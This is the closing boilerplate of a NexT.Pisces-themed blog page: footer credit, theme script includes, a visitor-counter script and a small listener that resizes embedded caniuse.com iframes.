  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.2.0</div>





 <script async src="//dn-lbstatics.gbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script> 

        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>










  
  















  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>




  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/affix.js?v=7.2.0"></script>

  <script src="/js/schemes/pisces.js?v=7.2.0"></script>



  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  <script src="/js/next-boot.js?v=7.2.0"></script>

  

  

  

  

  

  

  

  

  


  


  




  




  




  



<script>
// GET RESPONSIVE HEIGHT PASSED FROM IFRAME

window.addEventListener("message", function(e) {
  var data = e.data;
  if ((typeof data === 'string') && (data.indexOf('ciu_embed') > -1)) {
    var featureID = data.split(':')[1];
    var height = data.split(':')[2];
    $(`iframe[data-feature=${featureID}]`).height(parseInt(height) + 30);
  }
}, false);
</script>


  

  

  


  

</body>
</html>
